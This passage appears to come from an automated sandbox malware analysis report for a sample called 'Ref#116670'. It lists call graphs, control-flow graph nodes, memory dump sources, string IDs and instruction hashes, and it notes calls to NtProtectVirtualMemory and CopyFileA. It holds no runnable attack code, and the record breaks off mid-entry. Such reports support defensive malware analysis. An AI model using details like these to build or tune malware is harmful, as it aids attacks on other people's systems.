calls 66940->66944 66941->66940 66942->66940 66943->66940 66944->66940 67222 245b3b0 67223 245b3bf 67222->67223 67225 245b498 67222->67225 67226 245b4dc 67225->67226 67227 245b4b9 67225->67227 67226->67223 67227->67226 67228 245b6e0 GetModuleHandleW 67227->67228 67229 245b70d 67228->67229 67229->67223 66957 6a1071f 66958 6a10729 66957->66958 66963 5cd20f8 66958->66963 66967 5cd20a3 66958->66967 66972 5cd20e8 66958->66972 66959 6a10767 66964 5cd210d 66963->66964 66965 5cd2123 66964->66965 66976 5cd433d 66964->66976 66965->66959 66968 5cd2116 66967->66968 66969 5cd20aa 66967->66969 66970 5cd433d 2 API calls 66968->66970 66971 5cd2123 66968->66971 66969->66959 66970->66971 66971->66959 66973 5cd20f8 66972->66973 66974 5cd2123 66973->66974 66975 5cd433d 2 API calls 66973->66975 66974->66959 66975->66974 66977 5cd4351 66976->66977 66981 5cd71e4 66977->66981 66985 5cd71f0 66977->66985 66982 5cd7245 CopyFileA 66981->66982 66984 5cd7347 66982->66984 66986 5cd7245 CopyFileA 66985->66986 66988 5cd7347 66986->66988
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-3443518476
                                                                                                                                  • Opcode ID: b1278dc55a4e05b4e8ebd510093a208fd9ca8dcc9e8df0cfd7cca8b5adbe2efa
                                                                                                                                  • Instruction ID: 91685f6610e8a495eb8f164d7df701e517ed38dcf1f401194f4c1d6b83a71626
                                                                                                                                  • Opcode Fuzzy Hash: b1278dc55a4e05b4e8ebd510093a208fd9ca8dcc9e8df0cfd7cca8b5adbe2efa
                                                                                                                                  • Instruction Fuzzy Hash: F3B20274A002288FDB54DFA9C994BADB7B6BF88300F158599E505EF2A5CB70ED81CF50
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: ,aq$4$$]q$$]q$$]q$$]q
                                                                                                                                  • API String ID: 0-324474496
                                                                                                                                  • Opcode ID: 2119e480ab4b63943a5188de77f2fbe3b39c9a23f2eaa09cf2c1332b397e4e0d
                                                                                                                                  • Instruction ID: bfa6791fa2f2a1b154afdfab9fcf161ecbff63ec54e6685bbd11ba6d599470c3
                                                                                                                                  • Opcode Fuzzy Hash: 2119e480ab4b63943a5188de77f2fbe3b39c9a23f2eaa09cf2c1332b397e4e0d
                                                                                                                                  • Instruction Fuzzy Hash: 4222E834A00228CFDB64DF69C984BADB7B2BF48310F1591A9E509EF2A5DB319D81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1181 6819e18-6819e39 1182 6819e40-6819f27 1181->1182 1183 6819e3b 1181->1183 1185 681a629-681a651 1182->1185 1186 6819f2d-681a06e call 6816750 1182->1186 1183->1182 1189 681ad57-681ad60 1185->1189 1232 681a5f2-681a61c 1186->1232 1233 681a074-681a0cf 1186->1233 1190 681ad66-681ad7d 1189->1190 1191 681a65f-681a669 1189->1191 1193 681a670-681a764 call 6816750 1191->1193 1194 681a66b 1191->1194 1214 681a766-681a772 1193->1214 1215 681a78e 1193->1215 1194->1193 1217 681a774-681a77a 1214->1217 1218 681a77c-681a782 1214->1218 1219 681a794-681a7b4 1215->1219 1221 681a78c 1217->1221 1218->1221 1224 681a814-681a894 1219->1224 1225 681a7b6-681a80f 1219->1225 1221->1219 1246 681a896-681a8e9 1224->1246 1247 681a8eb-681a92e call 6816750 1224->1247 1236 681ad54 1225->1236 1243 681a626 1232->1243 1244 681a61e 1232->1244 1240 681a0d1 1233->1240 1241 681a0d4-681a0df 1233->1241 1236->1189 1240->1241 1245 681a507-681a50d 1241->1245 1243->1185 1244->1243 1248 681a513-681a58f 1245->1248 1249 681a0e4-681a102 1245->1249 1275 681a939-681a942 1246->1275 1247->1275 1291 681a5dc-681a5e2 1248->1291 1252 681a104-681a108 1249->1252 1253 681a159-681a16e 1249->1253 1252->1253 1258 681a10a-681a115 1252->1258 1256 681a170 1253->1256 1257 681a175-681a18b 1253->1257 1256->1257 1261 681a192-681a1a9 1257->1261 1262 681a18d 1257->1262 1263 681a14b-681a151 1258->1263 1267 681a1b0-681a1c6 1261->1267 1268 681a1ab 1261->1268 1262->1261 1265 681a153-681a154 1263->1265 1266 681a117-681a11b 1263->1266 1274 681a1d7-681a242 1265->1274 1269 681a121-681a139 1266->1269 1270 681a11d 1266->1270 1271 681a1c8 1267->1271 1272 681a1cd-681a1d4 1267->1272 1268->1267 1276 681a140-681a148 1269->1276 1277 681a13b 1269->1277 1270->1269 1271->1272 1272->1274 1278 681a244-681a250 1274->1278 1279 681a256-681a40b 1274->1279 1281 681a9a2-681a9b1 1275->1281 1276->1263 1277->1276 1278->1279 1289 681a40d-681a411 1279->1289 1290 681a46f-681a484 1279->1290 1282 681a9b3-681aa3b 1281->1282 1283 681a944-681a96c 1281->1283 1319 681abb4-681abc0 1282->1319 1286 681a973-681a99c 1283->1286 1287 681a96e 1283->1287 1286->1281 1287->1286 1289->1290 1297 681a413-681a422 1289->1297 1295 681a486 1290->1295 1296 681a48b-681a4ac 1290->1296 1293 681a591-681a5d9 1291->1293 1294 681a5e4-681a5ea 1291->1294 1293->1291 1294->1232 1295->1296 1298 681a4b3-681a4d2 1296->1298 1299 681a4ae 1296->1299 1301 681a461-681a467 1297->1301 1305 681a4d4 1298->1305 1306 681a4d9-681a4f9 1298->1306 1299->1298 1303 681a424-681a428 1301->1303 1304 681a469-681a46a 1301->1304 1310 681a432-681a453 1303->1310 1311 681a42a-681a42e 1303->1311 1308 681a504 1304->1308 1305->1306 1312 681a500 1306->1312 1313 681a4fb 1306->1313 1308->1245 1314 681a455 1310->1314 1315 681a45a-681a45e 1310->1315 1311->1310 1312->1308 1313->1312 1314->1315 1315->1301 1320 681aa40-681aa49 1319->1320 1321 681abc6-681ac21 1319->1321 1322 681aa52-681aba8 1320->1322 1323 681aa4b 1320->1323 1336 681ac23-681ac56 1321->1336 1337 681ac58-681ac82 1321->1337 1340 681abae 1322->1340 1323->1322 1326 681aae2-681ab22 1323->1326 1327 681ab27-681ab67 1323->1327 1328 681aa58-681aa98 1323->1328 1329 681aa9d-681aadd 1323->1329 1326->1340 1327->1340 1328->1340 1329->1340 1345 681ac8b-681ad1e 1336->1345 1337->1345 1340->1319 1349 681ad25-681ad45 1345->1349 1349->1236
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2270471714.0000000006810000.00000040.00000800.00020000.00000000.sdmp, Offset: 06810000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6810000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: TJbq$Te]q$paq$xb`q
                                                                                                                                  • API String ID: 0-4160082283
                                                                                                                                  • Opcode ID: 9a258e6584ae7b61726bcdeb37104efd24eb01daf05fae4d52a3b98d8807fd7a
                                                                                                                                  • Instruction ID: 50495b8ac5f8ce4feaedb16f11a99258a678f7fc39351662942563a27f04248c
                                                                                                                                  • Opcode Fuzzy Hash: 9a258e6584ae7b61726bcdeb37104efd24eb01daf05fae4d52a3b98d8807fd7a
                                                                                                                                  • Instruction Fuzzy Hash: 1CA2A375A01228CFDB65CF69C984ADDBBB2BF89304F1581E9D509AB325DB319E81CF40

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1709 6a19610-6a1962a 1710 6a19636-6a19642 1709->1710 1711 6a1962c-6a19633 1709->1711 1713 6a19644-6a19651 1710->1713 1714 6a1969e-6a196a1 1710->1714 1721 6a19657-6a19687 1713->1721 1722 6a1986f-6a198a7 1713->1722 1715 6a196a3-6a196a5 1714->1715 1716 6a196b4-6a196b7 1714->1716 1720 6a196ad 1715->1720 1718 6a196b9-6a196d7 1716->1718 1719 6a196dd-6a196e0 1716->1719 1718->1719 1728 6a198ae-6a198c9 1718->1728 1723 6a19865-6a1986c 1719->1723 1724 6a196e6-6a196ec 1719->1724 1720->1716 1753 6a19694-6a19697 1721->1753 1754 6a19689-6a19692 1721->1754 1722->1728 1724->1723 1726 6a196f2-6a196fb 1724->1726 1734 6a19733-6a19739 1726->1734 1735 6a196fd-6a1970c 1726->1735 1744 6a19856-6a1985c 1728->1744 1745 6a198cb-6a198f9 1728->1745 1736 6a19844-6a1984a 1734->1736 1737 6a1973f-6a19748 1734->1737 1735->1734 1743 6a1970e-6a19727 1735->1743 1736->1723 1740 6a1984c-6a19855 1736->1740 1737->1736 1749 6a1974e-6a1975a 1737->1749 1740->1744 1743->1734 1755 6a19729-6a1972c 1743->1755 1744->1723 1758 6a1985e-6a19863 1744->1758 1762 6a19932-6a19934 1745->1762 1763 6a198fb-6a19908 1745->1763 1760 6a19760-6a19788 1749->1760 1761 6a197f8-6a1983c 1749->1761 1753->1714 1754->1714 1755->1734 1758->1723 1760->1761 1774 6a1978a-6a197c7 1760->1774 1761->1736 1766 6a19d7f-6a19d86 1762->1766 1763->1762 1768 6a1990a-6a19930 1763->1768 1768->1762 1780 6a19939-6a1996d 1768->1780 1774->1761 1786 6a197c9-6a197f6 1774->1786 1789 6a19a10-6a19a1f 1780->1789 1790 6a19973-6a1997c 1780->1790 1786->1736 1797 6a19a21-6a19a37 1789->1797 1798 6a19a5e 1789->1798 1791 6a19982-6a19995 1790->1791 1792 6a19d87-6a19daf 1790->1792 1801 6a19997-6a199b0 1791->1801 1802 6a199fe-6a19a0a 1791->1802 1808 6a19a57-6a19a5c 1797->1808 1809 6a19a39-6a19a55 1797->1809 1800 6a19a60-6a19a65 1798->1800 1803 6a19a67-6a19a88 1800->1803 1804 6a19aa8-6a19ac4 1800->1804 1801->1802 1820 6a199b2-6a199c0 1801->1820 1802->1789 1802->1790 1803->1804 1824 6a19a8a 1803->1824 1812 6a19aca-6a19ad3 1804->1812 1813 6a19b8c-6a19b95 1804->1813 1808->1800 1809->1800 1812->1792 1818 6a19ad9-6a19af6 1812->1818 1816 6a19b9b 1813->1816 1817 6a19d7d 1813->1817 1821 6a19ba2-6a19ba4 1816->1821 1822 6a19c06-6a19c14 call 6a16cc0 1816->1822 1823 6a19ba9-6a19bb7 call 6a16cc0 1816->1823 1817->1766 1844 6a19b7a-6a19b86 1818->1844 1845 6a19afc-6a19b12 1818->1845 1820->1802 1832 6a199c2-6a199c6 1820->1832 1821->1766 1835 6a19c16-6a19c1c 1822->1835 1836 6a19c2c-6a19c2f 1822->1836 1833 6a19bb9-6a19bbf 1823->1833 1834 6a19bcf-6a19bd2 1823->1834 1828 6a19a8d-6a19aa6 1824->1828 1828->1804 1832->1792 1839 6a199cc-6a199e5 1832->1839 1840 6a19bc1 1833->1840 1841 6a19bc3-6a19bc5 1833->1841 1846 6a19bd4-6a19bd6 1834->1846 1847 6a19bdb-6a19be9 call 6a16cc0 1834->1847 1842 6a19c20-6a19c22 1835->1842 1843 6a19c1e 1835->1843 1848 6a19cc0-6a19cd1 call 6a16cc0 1836->1848 1849 6a19c35-6a19c43 call 6a16cc0 1836->1849 1839->1802 1865 6a199e7-6a199fb call 6a15af0 1839->1865 1840->1834 1841->1834 1842->1836 1843->1836 1844->1812 1844->1813 1845->1844 1877 6a19b14-6a19b22 1845->1877 1846->1766 1861 6a19c01 1847->1861 1862 6a19beb-6a19bf1 1847->1862 1859 6a19cd3-6a19cd9 1848->1859 1860 6a19ce9-6a19cec 1848->1860 1863 6a19c45-6a19c4b 1849->1863 1864 6a19c5b-6a19c6e call 6a16cc0 1849->1864 1867 6a19cdb 1859->1867 1868 6a19cdd-6a19cdf 1859->1868 1860->1817 1870 6a19cf2-6a19d03 call 6a16cc0 1860->1870 1861->1766 1871 6a19bf3 1862->1871 1872 6a19bf5-6a19bf7 1862->1872 1873 6a19c4d 1863->1873 1874 6a19c4f-6a19c51 1863->1874 1880 6a19c70-6a19c76 1864->1880 1881 6a19c86-6a19c93 1864->1881 1865->1802 1867->1860 1868->1860 1886 6a19d05-6a19d0b 1870->1886 1887 6a19d1b-6a19d2b call 6a16cc0 1870->1887 1871->1861 1872->1861 1873->1864 1874->1864 1877->1844 1893 6a19b24-6a19b28 1877->1893 1883 6a19c78 1880->1883 1884 6a19c7a-6a19c7c 1880->1884 1881->1848 1896 6a19c95-6a19ca3 call 6a16cc0 1881->1896 1883->1881 1884->1881 1888 6a19d0d 1886->1888 1889 6a19d0f-6a19d11 1886->1889 1897 6a19d43-6a19d50 1887->1897 1898 6a19d2d-6a19d33 1887->1898 1888->1887 1889->1887 1893->1792 1894 6a19b2e-6a19b57 1893->1894 1894->1844 1916 6a19b59-6a19b77 call 6a15af0 1894->1916 1905 6a19ca5-6a19cab 1896->1905 1906 6a19cbb 1896->1906 1897->1817 1910 6a19d52-6a19d63 call 6a16cc0 1897->1910 1901 6a19d35 1898->1901 1902 6a19d37-6a19d39 1898->1902 1901->1897 1902->1897 1907 6a19cad 1905->1907 1908 6a19caf-6a19cb1 1905->1908 1906->1766 1907->1906 1908->1906 1914 6a19d65-6a19d6b 1910->1914 1915 6a19d7b 1910->1915 1917 6a19d6d 1914->1917 1918 6a19d6f-6a19d71 1914->1918 1915->1766 1916->1844 1917->1915 1918->1915
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Pl]q$$]q
                                                                                                                                  • API String ID: 0-2369359564
                                                                                                                                  • Opcode ID: 0f0e9d12d3848c293cf5f9fd61371021fcebc3c438030389763c193376708826
                                                                                                                                  • Instruction ID: 3e458815bcfc27e5cc48d93a5ad9fa05e4afa45fe51e98b43ed16df052cc97dc
                                                                                                                                  • Opcode Fuzzy Hash: 0f0e9d12d3848c293cf5f9fd61371021fcebc3c438030389763c193376708826
                                                                                                                                  • Instruction Fuzzy Hash: 52423834B40204CFDB98EF29C9A4A6A7BF6BF89700B1584A9D506CF365DB35EC41CB61

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1923 5cdd168-5cdd189 1924 5cdd18b 1923->1924 1925 5cdd190-5cdd220 call 5cddcb8 1923->1925 1924->1925 1930 5cdd226-5cdd263 1925->1930 1932 5cdd265-5cdd270 1930->1932 1933 5cdd272 1930->1933 1934 5cdd27c-5cdd397 1932->1934 1933->1934 1945 5cdd3a9-5cdd3d4 1934->1945 1946 5cdd399-5cdd39f 1934->1946 1947 5cddb9a-5cddbb6 1945->1947 1946->1945 1948 5cddbbc-5cddbd7 1947->1948 1949 5cdd3d9-5cdd53c call 5cdc0d0 1947->1949 1960 5cdd54e-5cdd6dd call 5cd9b88 call 5cd6e00 1949->1960 1961 5cdd53e-5cdd544 1949->1961 1973 5cdd6df-5cdd6e3 1960->1973 1974 5cdd742-5cdd74c 1960->1974 1961->1960 1975 5cdd6eb-5cdd73d 1973->1975 1976 5cdd6e5-5cdd6e6 1973->1976 1977 5cdd973-5cdd992 1974->1977 1978 5cdda18-5cdda83 1975->1978 1976->1978 1979 5cdd998-5cdd9c2 1977->1979 1980 5cdd751-5cdd897 call 5cdc0d0 1977->1980 1997 5cdda95-5cddae0 1978->1997 1998 5cdda85-5cdda8b 1978->1998 1986 5cdda15-5cdda16 1979->1986 1987 5cdd9c4-5cdda12 1979->1987 2009 5cdd89d-5cdd969 call 5cdc0d0 1980->2009 2010 5cdd96c-5cdd96d 1980->2010 1986->1978 1987->1986 2000 5cddb7f-5cddb97 1997->2000 2001 5cddae6-5cddb7e 1997->2001 1998->1997 2000->1947 2001->2000 2009->2010 2010->1977
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fbq$8
                                                                                                                                  • API String ID: 0-3186246319
                                                                                                                                  • Opcode ID: 4caa07a3442d604763f3c6d2b817d2d99c4ad2be54ef268d027e8215b8194c0f
                                                                                                                                  • Instruction ID: 942c683ef5d4dd218c396d74eb0571d58678919111d52d9e098d1d11e64f06ea
                                                                                                                                  • Opcode Fuzzy Hash: 4caa07a3442d604763f3c6d2b817d2d99c4ad2be54ef268d027e8215b8194c0f
                                                                                                                                  • Instruction Fuzzy Hash: FE52D7B5E006298FDB64DF69C950AD9B7B2FF89300F50869AD909B7354DB30AE81CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2259 6a119f9-6a11a27 2262 6a11a29-6a11a2f 2259->2262 2263 6a11a31 2262->2263 2264 6a11a38-6a11a39 2262->2264 2263->2264 2265 6a11bb5-6a11bf3 2263->2265 2266 6a11c04-6a11ca8 call 6a11300 2263->2266 2267 6a11ad9-6a11b38 2263->2267 2268 6a11cbb-6a11d00 2263->2268 2269 6a11a3e-6a11ad4 call 6a11300 2263->2269 2264->2268 2265->2262 2282 6a11bf9-6a11bff 2265->2282 2266->2262 2300 6a11cae-6a11cb6 2266->2300 2292 6a11b44-6a11ba2 2267->2292 2283 6a11d02-6a11d08 2268->2283 2284 6a11d0a-6a11d0f 2268->2284 2269->2262 2282->2262 2283->2284 2286 6a11d11-6a11d12 2284->2286 2287 6a11d14-6a11d62 2284->2287 2286->2287 2298 6a11d64-6a11d6a 2287->2298 2299 6a11d6c-6a11d71 2287->2299 2292->2262 2304 6a11ba8-6a11bb0 2292->2304 2298->2299 2302 6a11d73-6a11d74 2299->2302 2303 6a11d76-6a11d93 2299->2303 2300->2262 2302->2303 2360 6a11d99 call 6a12708 2303->2360 2361 6a11d99 call 6a126fa 2303->2361 2304->2262 2306 6a11d9f-6a11db5 2307 6a11dc1-6a11dc7 2306->2307 2308 6a11db7-6a11dbf 2306->2308 2309 6a11dd0-6a11dd1 2307->2309 2310 6a11dc9 2307->2310 2308->2307 2320 6a11e33-6a11e47 2309->2320 2310->2309 2311 6a11ea2-6a11ea3 2310->2311 2312 6a12082-6a12083 2310->2312 2313 6a11ea5-6a11eea 2310->2313 2314 6a12085 2310->2314 2315 6a11f66-6a11fb2 2310->2315 2316 6a1212b 2310->2316 2317 6a11e4c-6a11e69 2310->2317 2318 6a1202c-6a12075 2310->2318 2319 6a120d0-6a120d1 2310->2319 2310->2320 2321 6a11dd3-6a11e29 2310->2321 2322 6a120d3-6a1211e 2310->2322 2323 6a11ef6 2310->2323 2324 6a11fbf-6a11fc0 2310->2324 2326 6a11ef7 2311->2326 2325 6a12086 2312->2325 2342 6a11e90-6a11e96 2313->2342 2355 6a11eec-6a11ef4 2313->2355 2314->2325 2330 6a11f51-6a11f5a 2315->2330 2357 6a11fb4-6a11fbd 2315->2357 2327 6a1212c 2316->2327 2317->2313 2331 6a11e6b-6a11e84 2317->2331 2341 6a12017-6a12020 2318->2341 2359 6a12077-6a12080 2318->2359 2319->2327 2320->2307 2321->2307 2358 6a11e2b-6a11e31 2321->2358 2337 6a120bb-6a120c4 2322->2337 2356 6a12120-6a12129 2322->2356 2323->2326 2324->2341 2325->2337 2326->2330 2340 6a1212d 2327->2340 2338 6a11f63-6a11f64 2330->2338 2339 6a11f5c 2330->2339 2331->2342 2343 6a11e86-6a11e8e 2331->2343 2347 6a120c6 2337->2347 2348 6a120cd-6a120ce 2337->2348 2338->2315 2338->2324 2339->2312 2339->2314 2339->2315 2339->2316 2339->2318 2339->2319 2339->2322 2339->2324 2340->2340 2349 6a12022 2341->2349 2350 6a12029-6a1202a 2341->2350 2352 6a11e98 2342->2352 2353 6a11e9f-6a11ea0 2342->2353 2343->2342 2347->2316 2347->2319 2347->2322 2348->2319 2348->2322 2349->2312 2349->2314 2349->2316 2349->2318 2349->2319 2349->2322 2350->2314 2350->2318 2352->2311 2352->2312 2352->2313 2352->2314 2352->2315 2352->2316 2352->2318 2352->2319 2352->2322 2352->2323 2352->2324 2352->2353 2353->2313 2355->2342 2356->2337 2357->2330 2358->2307 2359->2341 2360->2306 2361->2306
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271182887.0000000006A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A10000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a10000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: Te]q$ssd
                                                                                                                                  • API String ID: 0-2907924804
                                                                                                                                  • Opcode ID: 6bef5a25540414a2b63dd714b248c854f7cd9cdb9990b310f8fba78b656f06ff
                                                                                                                                  • Instruction ID: e7435c25b68956c122a9be42c204d6423dd899804b30d10a20aae4a35855b8e4
                                                                                                                                  • Opcode Fuzzy Hash: 6bef5a25540414a2b63dd714b248c854f7cd9cdb9990b310f8fba78b656f06ff
                                                                                                                                  • Instruction Fuzzy Hash: 990206B0E05218CFDBA4EF68D844BA9B7F2FB49300F5081AAD549AB355DB305E85CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 2704 5cdd159-5cdd189 2706 5cdd18b 2704->2706 2707 5cdd190-5cdd220 call 5cddcb8 2704->2707 2706->2707 2712 5cdd226-5cdd263 2707->2712 2714 5cdd265-5cdd270 2712->2714 2715 5cdd272 2712->2715 2716 5cdd27c-5cdd397 2714->2716 2715->2716 2727 5cdd3a9-5cdd3d4 2716->2727 2728 5cdd399-5cdd39f 2716->2728 2729 5cddb9a-5cddbb6 2727->2729 2728->2727 2730 5cddbbc-5cddbd7 2729->2730 2731 5cdd3d9-5cdd53c call 5cdc0d0 2729->2731 2742 5cdd54e-5cdd6dd call 5cd9b88 call 5cd6e00 2731->2742 2743 5cdd53e-5cdd544 2731->2743 2755 5cdd6df-5cdd6e3 2742->2755 2756 5cdd742-5cdd74c 2742->2756 2743->2742 2757 5cdd6eb-5cdd73d 2755->2757 2758 5cdd6e5-5cdd6e6 2755->2758 2759 5cdd973-5cdd992 2756->2759 2760 5cdda18-5cdda83 2757->2760 2758->2760 2761 5cdd998-5cdd9c2 2759->2761 2762 5cdd751-5cdd897 call 5cdc0d0 2759->2762 2779 5cdda95-5cddae0 2760->2779 2780 5cdda85-5cdda8b 2760->2780 2768 5cdda15-5cdda16 2761->2768 2769 5cdd9c4-5cdda12 2761->2769 2791 5cdd89d-5cdd969 call 5cdc0d0 2762->2791 2792 5cdd96c-5cdd96d 2762->2792 2768->2760 2769->2768 2782 5cddb7f-5cddb97 2779->2782 2783 5cddae6-5cddb7e 2779->2783 2780->2779 2782->2729 2783->2782 2791->2792 2792->2759
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264799606.0000000005CD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cd0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: fbq$h
                                                                                                                                  • API String ID: 0-3598783323
                                                                                                                                  • Opcode ID: d26f41da4190bfe6813ca428c03dfb64d0a8fc271ae5d191f108a30a9c0c3cce
                                                                                                                                  • Instruction ID: 7899c63ab94fcbd90efa9aa9720a21a91f2b5ebb25e0140140665553f6146452
                                                                                                                                  • Opcode Fuzzy Hash: d26f41da4190bfe6813ca428c03dfb64d0a8fc271ae5d191f108a30a9c0c3cce
                                                                                                                                  • Instruction Fuzzy Hash: 5971F7B5E006298BDB64DF69D850BD9B7B2FF89300F50C6AAD509B7254DB306E81CF60
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: (aq
                                                                                                                                  • API String ID: 0-600464949
                                                                                                                                  • Opcode ID: 0abd979482398db65254e1071f9455ff2f29d36380badf8a80dcc8d4e433c4bd
                                                                                                                                  • Instruction ID: a6c3c328e530220ecdfe38b6f146894b88bd71e09d63fe2515fd3f4b4428da15
                                                                                                                                  • Opcode Fuzzy Hash: 0abd979482398db65254e1071f9455ff2f29d36380badf8a80dcc8d4e433c4bd
                                                                                                                                  • Instruction Fuzzy Hash: AD328870B006198FDB58EF69D5A466EFBF2FF88300F248529D55ADB381CB34A915CB81
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB0371
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 3f89a440ccbbf0afb00d24a91b2a6724c38256b298800c88ffcc7a1b63368c0c
                                                                                                                                  • Instruction ID: e9b8220ea2af0528284474b796712a2cfab56471b4e56d5acaf40a7e4815b0b6
                                                                                                                                  • Opcode Fuzzy Hash: 3f89a440ccbbf0afb00d24a91b2a6724c38256b298800c88ffcc7a1b63368c0c
                                                                                                                                  • Instruction Fuzzy Hash: 8821E4B1D013499FCB10DFAAD984AEEFBF5FF48310F20842AE559A7250C775A940CBA1
                                                                                                                                  APIs
                                                                                                                                  • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 05CB0371
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2264693277.0000000005CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CB0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_5cb0000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MemoryProtectVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2706961497-0
                                                                                                                                  • Opcode ID: 90cbe8e1fb638bb1a43e2464a8bac34c34b9ac0cdba53be8350b3312ce5759b1
                                                                                                                                  • Instruction ID: 19af3124eadf517bcb5424b94ccda5d6724c78692edf37a15095cf5cbb6034b9
                                                                                                                                  • Opcode Fuzzy Hash: 90cbe8e1fb638bb1a43e2464a8bac34c34b9ac0cdba53be8350b3312ce5759b1
                                                                                                                                  • Instruction Fuzzy Hash: 7D2103B5D003099FCB10DFAAD985AEEFBF5FF48310F20842AE519A7210C7799940CBA0
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: PH]q
                                                                                                                                  • API String ID: 0-3168235125
                                                                                                                                  • Opcode ID: 7d516e9f9507232813b94a89f030af189a3eb3b2f04bd971bec6212ef96b1a79
                                                                                                                                  • Instruction ID: 9fe862d0fdd447095963ed9ad9eabcb7f6a59808fd1ac53daa14bc69ef51cf0e
                                                                                                                                  • Opcode Fuzzy Hash: 7d516e9f9507232813b94a89f030af189a3eb3b2f04bd971bec6212ef96b1a79
                                                                                                                                  • Instruction Fuzzy Hash: 75D13A74E04318CFEB64EF69E844BADB7F2FB49300F1080A9D549AB296DB705985CF51
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.2271136137.0000000006A00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A00000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_6a00000_Ref#116670.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
